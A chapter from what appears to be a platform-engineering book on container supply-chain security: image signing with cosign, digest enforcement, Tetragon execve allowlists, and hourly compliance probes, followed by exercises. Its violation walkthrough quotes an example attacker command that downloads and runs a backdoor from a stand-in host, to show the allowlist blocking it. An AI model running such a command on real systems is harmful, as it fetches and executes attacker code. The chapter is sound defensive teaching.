Skip to content

Chapter 14: Supply Chain and Compliance

A perfectly secured network is useless if the service running inside it is a compromised image. And a perfectly designed security architecture is useless if you can’t prove it’s working.

This chapter covers two concerns that bookend the derivation pipeline: the supply chain (is the code trustworthy before it runs?) and compliance (can you prove the security model is working after it’s deployed?). The decisions:

  • Where in the chain do you verify trust? (At build time? At the registry? At derivation time? At runtime? All four?)
  • How do you prove security is working? (Quarterly audits with spreadsheets? Or continuous evaluation with probes and evidence?)

From code to running binary, four links:

1. Build. CI builds the container image and signs it with a cosign private key. The signature proves a specific key signed a specific image digest. The signature is stored alongside the image in the registry as an OCI artifact.

2. Registry. The image and its signature are stored. Content-addressable digests (@sha256:abc123) ensure immutability — different content produces a different digest. Tags (v1.2.3) are mutable and can be overwritten. The platform rejects tags by default.

3. Derivation time. The platform verifies the image signature against TrustPolicy CRDs and evaluates Cedar DeployImage authorization before producing any Kubernetes resources. Unsigned images never produce a Deployment. Unauthorized images never produce an ExternalSecret. The derivation pipeline stops at the first gate.

4. Runtime. The image is verified and authorized, the Deployment is created, the pod runs. But the image can still execute binaries not in the original image — download a binary from the internet, run a shell command, execute dynamically-fetched code. Tetragon intercepts execve syscalls via eBPF and blocks binaries not on the allowlist.

Each link catches a different failure. A compromised build produces a signed-but-malicious image (caught at runtime by Tetragon if the binary isn’t on the allowlist, or not caught if the malicious code runs within an allowed binary). Registry tampering replaces an image tag (caught at derivation time by digest enforcement). A bad policy admits an unsigned image (caught at derivation time by TrustPolicy verification). A runtime escape executes an unauthorized binary (caught by Tetragon).

No single link is sufficient. The chain is defense in depth applied to the supply chain.

The TrustPolicy CRD maps signing keys to registries:

apiVersion: lattice.dev/v1alpha1
kind: TrustPolicy
metadata:
name: internal-registry
spec:
registry: registry.example.com
cosign:
publicKey:
secretRef: signing-keys/cosign-public

At derivation time, the pipeline verifies each container image against the applicable TrustPolicy. The verification checks cosign signatures against the configured public key. If the image is signed, the DeployImage Cedar gate evaluates whether this service is authorized to deploy it.

Verification caching. Cosign verification fetches the signature from the registry and verifies the cryptographic signature — not free at scale. The reference implementation caches results: 5 minutes for verified images, 60 seconds for failed verifications. Concurrent verifications of the same image are coalesced — one verification runs, others wait for the result.

Digest enforcement. Tags are mutable — v1.2.3 can be overwritten. Digests (@sha256:abc123) are content-addressable. The AllowTagReference Cedar gate defaults to deny: images must use digests. Teams migrating from tag-based workflows can request an explicit permit.

The trade-off. Image verification adds latency to the derivation pipeline. Cache misses require a network call to the registry. If the registry is slow or unreachable, verification blocks derivation. The caching mitigates this for steady-state (most images are already verified) but cold starts (new images, cleared cache) are slower.

Tool alternatives. The reference implementation uses cosign (Sigstore). Notation (Notary v2) is the OCI-standard alternative. Docker Content Trust is legacy. The principle is the same: verify at derivation time, refuse to produce resources for unverified images.

Keyless signing and Rekor. Cosign supports keyless signing — the signer authenticates with an OIDC identity (GitHub Actions, Google Workload Identity) and receives a short-lived certificate from Sigstore’s Fulcio CA. The signature and certificate are logged in Rekor, Sigstore’s transparency log. Verification checks the Rekor log to confirm the signature was created during the certificate’s validity window. This eliminates long-lived signing keys but adds a dependency: if Rekor is unreachable, keyless verification fails. The reference implementation uses key-based signing (a cosign private key in CI) to avoid the Rekor dependency. Teams that prefer keyless signing must ensure Rekor reachability from the derivation pipeline — or run a private Rekor instance.

Image verification proves the image is what you expect. It doesn’t prove what happens inside it at runtime.

A verified container can download a binary from the internet, execute a shell command not in the original image, or run dynamically-generated code through an interpreter. Network policies may allow the egress (if the service has an external-service dependency). Image verification passed at derivation time. The attack happens at runtime.

Tetragon intercepts execve syscalls via eBPF. A TracingPolicyNamespaced specifies allowed binaries. The derivation pipeline generates Tetragon policies from the service spec — if the spec declares containers with specific entrypoints, the pipeline produces an allowlist.

A concrete example for a service whose container runs /app/server and uses a shell-based health probe:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicyNamespaced
metadata:
name: payment-service-allowlist
namespace: payments
spec:
tracing:
- call: "execve"
syscall: true
args:
- index: 0
type: "string"
selectors:
- matchArgs:
- index: 0
operator: "NotIn"
values:
- "/app/server"
- "/bin/sh"
- "/usr/bin/curl"
matchActions:
- action: Signal
argSig: 9

The policy allows three binaries: the application entrypoint, /bin/sh for the readiness probe, and curl for the health check command. Any other execve call receives SIGKILL.

Violation walkthrough. Suppose an attacker gains code execution inside the payment-service container and runs wget http://evil.example.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor. The shell invocation (/bin/sh) is allowed — it’s on the allowlist for health probes. But wget is not on the allowlist. When the kernel dispatches the execve syscall for /usr/bin/wget, Tetragon’s eBPF program intercepts it, matches the binary path against the allowlist, finds no match, and sends SIGKILL. The wget process is killed before it executes a single instruction. The pod continues running — the application binary is unaffected — but the unauthorized binary never executes. Tetragon logs the violation with the binary path, PID, container ID, and namespace, providing a forensic trail.

Monitoring vs. enforcement mode. The matchActions field controls what happens on violation. Replace action: Signal with action: Post to run in monitoring mode — violations are logged to Tetragon’s event stream but the binary executes normally. The reference implementation starts every new allowlist in monitoring mode. The operations team reviews violations over a burn-in period (typically one to two weeks in staging, then one week in production). Violations that are false positives — legitimate binaries missing from the allowlist — are added. Once the violation stream shows only true positives (binaries that should genuinely be blocked), the policy transitions to enforcement mode. This staged rollout prevents the allowlist from breaking applications. A bad allowlist in enforcement mode causes health probes to fail, pods to restart, and services to go unavailable. Monitoring mode makes the cost of mistakes a log entry, not an outage.

Allowlist derivation. Developers do not write these policies by hand. The derivation pipeline generates them. The pipeline reads the container image metadata (entrypoint and command from the image config), the pod spec (readiness and liveness probe commands), and any sidecar containers injected by the mesh. From this, it builds the allowlist: the entrypoint binary, any binaries referenced in probe exec commands, and a small set of well-known utilities that the platform explicitly permits (such as /bin/sh when a probe uses exec). The developer declares their service; the pipeline derives the enforcement policy. If a developer changes their health probe from an exec probe to an HTTP probe, the next derivation cycle removes /bin/sh and curl from the allowlist — tightening the policy automatically.

SBOM and vulnerability scanning. Image signing (Section 14.2) proves the image is authentic — it was built by your CI system and has not been tampered with. It does not prove the image is free of known vulnerabilities. The derivation pipeline integrates container scanning tools (Trivy or Grype) to complement signing with vulnerability assessment. When the pipeline resolves an image, it checks for a recent scan result. If no scan exists or the scan is stale, the pipeline triggers one. The scan produces an SBOM (Software Bill of Materials) listing all packages in the image and cross-references them against vulnerability databases. The DeployImage Cedar gate can evaluate scan results: deny deployment if the image contains critical CVEs, warn on high-severity CVEs, or permit with informational notes for lower severities. This creates two complementary gates — signing proves provenance, scanning proves safety — both evaluated before the pipeline produces any Kubernetes resources.

The trade-off. Binary allowlisting is hard to get right. Applications have many legitimate binaries: health check scripts, shell commands in readiness probes, interpreters for scripting languages. The allowlist must be permissive enough to not break the application. The staged monitoring-to-enforcement rollout mitigates this, but it requires operational discipline — someone must review violations and approve the transition.

What about interpreted languages? If the allowlist permits /usr/bin/python (because that’s the entrypoint), can an attacker with code execution inside that process do anything? They can use Python’s standard library — urllib, socket — but they can’t shell out: subprocess.run() and os.system() invoke execve, which Tetragon intercepts and kills. They can’t run wget, curl, or /bin/sh unless those are on the allowlist. The attacker is confined to the interpreter’s own capabilities, within the network boundaries the other layers enforce — L4 egress only permits declared external-service endpoints, L7 identity enforcement restricts which services they can call. Tetragon isn’t bypassed; it’s working as designed. The layers complement each other: Tetragon prevents lateral binary execution, network policies prevent unauthorized communication, and the combination constrains even an attacker with in-process code execution.

Not every workload needs binary enforcement. It’s most valuable for production workloads with a well-known binary set. Development environments and scripting-heavy workloads may operate in monitoring mode permanently.

Chapters 12-14.3 described the security architecture. This section addresses how you prove it’s working — not at audit time, but continuously.

The argument. Configuration is evidence of existence. A CiliumClusterwideNetworkPolicy exists — that proves you configured default-deny. But does it prove default-deny is working right now? The policy might be misconfigured. Cilium might be unhealthy. A namespace might have been incorrectly exempted. Configuration proves intent. Continuous evaluation proves effectiveness.

The LatticeComplianceProfile CRD:

apiVersion: lattice.dev/v1alpha1
kind: LatticeComplianceProfile
metadata:
name: production
spec:
frameworks:
- nist-800-53-moderate
- cis-kubernetes
- soc-2
scanInterval: 1h

The compliance controller reconciles this CRD: for each framework, iterate through applicable controls, run probes, record pass/fail with evidence.

Cedar authorization probes. Submit a known-bad request and verify denial. To verify unsigned images are rejected: submit a DeployImage request with resource.signed: false and verify deny. This proves the policy is loaded, evaluated correctly, and producing the right result — not just that the policy file exists.

Resource existence probes. Verify expected resources exist and are healthy. Is the default-deny CiliumClusterwideNetworkPolicy present? Is the Istio default-deny AuthorizationPolicy in place? Are Tetragon DaemonSets running on every node?

Configuration probes. Verify cluster-level configuration: API server audit logging enabled, etcd encrypted at rest, kubelet settings per CIS benchmarks.

Deployment readiness probes. Verify security infrastructure is healthy: Cilium agents running on all nodes, Istio control plane reconciling, cert-manager issuing certificates.

Platform features map to compliance controls:

NIST AC-4 (Information Flow Enforcement). Feature: bilateral agreements + CiliumNetworkPolicy + AuthorizationPolicy. Probe: verify default-deny policies exist, submit test traffic between services without bilateral agreements and verify denial.

NIST SC-8 (Transmission Confidentiality and Integrity). Feature: mTLS via mesh, certificate rotation, signing key management. Probe: verify services have valid mTLS certificates, verify cert-manager is rotating.

CIS 5.3.2 (NetworkPolicy for all namespaces). Feature: default-deny CiliumClusterwideNetworkPolicy. Probe: list non-system namespaces, verify each has at least one CiliumNetworkPolicy.

SOC 2 CC6.1 (Logical access security). Feature: Cedar authorization gates. Probe: submit unauthorized requests and verify denial.

Walk through what happens when the compliance controller runs.

t=0. The controller reads the LatticeComplianceProfile CRD: scan NIST 800-53 Moderate, CIS Kubernetes, and SOC 2. Scan interval: 1 hour. Last scan: 59 minutes ago.

t=1s. NIST AC-4 (Information Flow Enforcement). Probe: verify the default-deny CiliumClusterwideNetworkPolicy exists. The controller queries the API server. The policy exists. Result: pass.

t=2s. NIST AC-4 continued. Probe: submit a test request between two services with no bilateral agreement. The controller creates a short-lived test pod in a dedicated compliance namespace, attempts a connection to a service it has no bilateral agreement with, and verifies the connection is denied (connection timeout or reset, not HTTP 200). The pod is deleted immediately after the test — the compliance scanner itself must not become a lateral movement vector. The compliance namespace should have CiliumNetworkPolicies restricting its own egress to only the specific probe targets (the services under test and the API server), denying all other egress. Probe pods should run with a dedicated ServiceAccount whose RBAC grants only the minimum verbs needed (create/delete test pods, get network policies) and nothing else — no secrets access, no exec, no port-forward. A compromised compliance controller with broad cluster access is a privilege escalation path, not a security tool. Result: pass — default-deny is enforced, not just configured.

t=5s. NIST SC-8 (Transmission Confidentiality and Integrity). Probe: check that all SPIFFE SVIDs in the mesh are valid (not expired, issued by the expected CA). The controller queries istiod’s certificate status. 198 of 200 services have valid SVIDs. 2 services have SVIDs expiring in 3 hours (normal — rotation happens at 75% of lifetime). Result: pass with informational note.

t=10s. CIS 5.3.2 (NetworkPolicy for all namespaces). Probe: list all non-system namespaces. For each, verify at least one CiliumNetworkPolicy exists. 48 of 50 namespaces have policies. 2 namespaces were just created and have no services yet — no policies expected. Result: pass.

t=15s. SOC 2 CC6.1 (Logical access security). Probe: submit a DeployImage request with resource.signed: false to the Cedar engine. Verify the result is deny. Result: pass — unsigned images are rejected.

t=20s. All probes complete. The controller writes the results to the ComplianceProfile status:

status:
lastScanTime: "2026-04-06T02:00:20Z"
frameworks:
nist-800-53-moderate:
passed: 29
failed: 0
total: 29
cis-kubernetes:
passed: 4
failed: 0
total: 4
soc-2:
passed: 5
failed: 0
total: 5

All green. The next scan is in 1 hour. Monitoring dashboards scrape this status. If any control fails, an alert fires.

A quarterly audit tests a sample of controls once. A compliance controller tests all controls every scan interval.

A configuration that drifted last week is caught at the next scan, not the next audit. A manual audit produces a PDF. The compliance controller produces a CRD status that monitoring scrapes, dashboards display, and alerts fire on.

The trade-off. Continuous compliance creates alert noise. The controller runs every hour. Every transient failure (pod restarting, certificate about to rotate) is a condition. The platform must distinguish between alerts (page someone — default-deny policy deleted), warnings (dashboard — Tetragon DaemonSet at 9/10 nodes), and informational (log — certificate rotating in 7 days). Without this classification, teams ignore all compliance alerts.

The limitation. Continuous compliance automates evaluation. It does not replace auditors. Auditors validate that the probes test the right things, that the control mapping is correct, and that the evidence is meaningful. The controller is a tool for the audit, not a replacement for it.

Scenario: stale verification cache. A signing key is compromised. The security team revokes it by updating the TrustPolicy CRD. But the verification cache still holds “verified” results for images signed with the compromised key — cached for 5 minutes.

During those 5 minutes, a developer deploys a new service using an image signed by the compromised key. The cache returns “verified.” The DeployImage gate passes. The Deployment is created. A compromised image is running in the cluster.

After 5 minutes, the cache entry expires. The next derivation cycle re-verifies the image against the updated TrustPolicy. The verification fails (key revoked). The status reports ImageVerified: False. But the Deployment already exists — the all-or-nothing rule doesn’t tear down running services on re-derivation failure (Chapter 8, Section 8.7).

The gap: A 5-minute window where compromised images can be deployed after key revocation. The mitigation: event-driven cache invalidation (watch TrustPolicy changes, clear affected cache entries immediately) reduces the window to seconds. The reference implementation uses TTL-based expiry — which means the 5-minute window is real. Platforms with strict requirements should implement event-driven invalidation.

Scenario: compliance alert fatigue. The compliance controller runs every hour. It reports 36 controls across 3 frameworks. One month in, the team has 50 compliance conditions in their monitoring dashboard. Most are transient: a Tetragon DaemonSet briefly at 9/10 nodes during a rolling upgrade, a certificate at 80% lifetime (normal rotation), a new namespace with no services yet.

The team starts ignoring all compliance alerts. Then the default-deny CiliumClusterwideNetworkPolicy is accidentally deleted during a debugging session. The compliance controller catches it on the next scan — but the alert sits among 49 other conditions that the team has trained themselves to ignore. For 59 minutes, the cluster has no default-deny.

The lesson: Continuous compliance is only valuable if alert classification is correct. Critical failures (default-deny policy deleted, Cedar policy evaluation returning unexpected results) must page someone. Informational conditions (certificate rotating on schedule, DaemonSet rolling) must be dashboard-only. The compliance controller must distinguish between “something is broken” and “something is in progress.” Without this classification, continuous compliance creates noise that masks real failures.

The security architecture:

  • Chapter 12: Default-deny posture, four enforcement layers, concrete request walkthrough showing all layers in action.
  • Chapter 13: Cedar authorization at derivation time, bilateral network agreements, cross-service policy compilation, debugging denials.
  • Chapter 14: Supply chain trust chain (build → registry → derivation → runtime), continuous compliance verification with probes and evidence.

Part V covers networking — the service mesh and identity infrastructure that the network and identity enforcement layers depend on, multi-cluster mesh, and edge networking.

14.1. [M10] A developer pushes an unsigned image and references it by digest in their LatticeService spec. At which step in the derivation pipeline does the failure occur? What does the status report? What does the developer need to do?

14.2. [H30] The verification cache stores “verified” for 5 minutes. A signing key is compromised and revoked. Images signed by the compromised key are cached as “verified” for up to 5 minutes. Design the cache invalidation: how does key revocation propagate? What is the maximum vulnerability window?

14.3. [R] The trust chain has four links. If you could invest in only two, which two provide the most coverage? Does the answer change for: (a) insider threat, (b) external attacker, (c) supply chain compromise of a dependency?

14.4. [M10] Tetragon blocks binary execution. A container’s readiness probe runs /bin/sh -c "curl localhost:8080/healthz". The allowlist doesn’t include /bin/sh or curl. The pod never becomes Ready. How should the derivation pipeline generate allowlists that include probe binaries automatically?

14.5. [H30] A Cedar authorization probe submits DeployImage with resource.signed: false and expects deny. The probe returns permit. List the possible causes in order of likelihood: (a) the Cedar policy has a bug, (b) the policy was deleted, (c) the probe is misconfigured, (d) the policy engine has a bug. For each cause, describe the detection and remediation.

14.6. [R] The compliance controller scans every hour. Between scans, someone deletes the default-deny CiliumClusterwideNetworkPolicy. For up to 59 minutes, default-deny is gone. Should the compliance controller scan more frequently (cost: more API server load)? Should a different mechanism prevent the deletion (cost: complexity)? Should the default-deny policy be owned by a controller that reconciles it continuously (cost: another controller to maintain)?